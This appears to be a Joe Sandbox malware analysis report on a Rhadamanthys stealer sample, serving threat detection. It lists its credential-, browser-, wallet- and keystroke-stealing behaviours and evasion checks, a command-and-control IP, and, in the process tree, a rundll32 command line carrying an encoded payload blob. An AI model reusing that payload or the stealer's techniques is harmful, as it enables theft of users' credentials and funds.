Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MqE1p1WFrf.exe

Overview

General Information

Sample Name:MqE1p1WFrf.exe
Analysis ID:790122
MD5:dd10393642798db29a624785ead8ecec
SHA1:39aad598cfe75a9d8770fef63b5c81db3acfa3b7
SHA256:0130938796c7911601ade2602e770b07dad32051199372d93c7ed8bfd0e59659
Tags:32exeRhadamanthystrojan
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries memory information (via WMI often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • MqE1p1WFrf.exe (PID: 3648 cmdline: C:\Users\user\Desktop\MqE1p1WFrf.exe MD5: DD10393642798DB29A624785EAD8ECEC)
    • rundll32.exe (PID: 3352 cmdline: "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6076 cmdline: C:\Windows\system32\WerFault.exe -u -p 3352 -s 648 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.rundll32.exe.17ed8d50000.9.unpackJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
              4.3.rundll32.exe.17ed8ee0000.11.unpackJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
                4.3.rundll32.exe.17ed8d50000.8.unpackJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
                  4.3.rundll32.exe.17ed8e60000.14.unpackJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
                    1.3.MqE1p1WFrf.exe.2830000.2.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.5179.43.163.12649701802853002 01/23/23-21:39:53.428050
                      SID:2853002
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:179.43.163.126192.168.2.580497002853001 01/23/23-21:39:35.293558
                      SID:2853001
                      Source Port:80
                      Destination Port:49700
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.5179.43.163.12649700802043202 01/23/23-21:39:35.266442
                      SID:2043202
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: MqE1p1WFrf.exeReversingLabs: Detection: 64%
                      Source: MqE1p1WFrf.exeVirustotal: Detection: 68%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\nsis_uns60877c.dllReversingLabs: Detection: 20%
                      Source: C:\Users\user\AppData\Roaming\nsis_uns60877c.dllVirustotal: Detection: 23%Perma Link
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DAC06C CryptUnprotectData,4_2_00007DF471DAC06C
                      Source: MqE1p1WFrf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: Binary string: wkernel32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: MqE1p1WFrf.exe, 00000001.00000003.325515967.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.325224942.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdb source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
                      Source: Binary string: profapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA828C _calloc_dbg,FindFirstFileW,FindNextFileW,4_2_00007DF471DA828C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA782C FindFirstFileW,FindNextFileW,FindClose,4_2_00007DF471DA782C
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
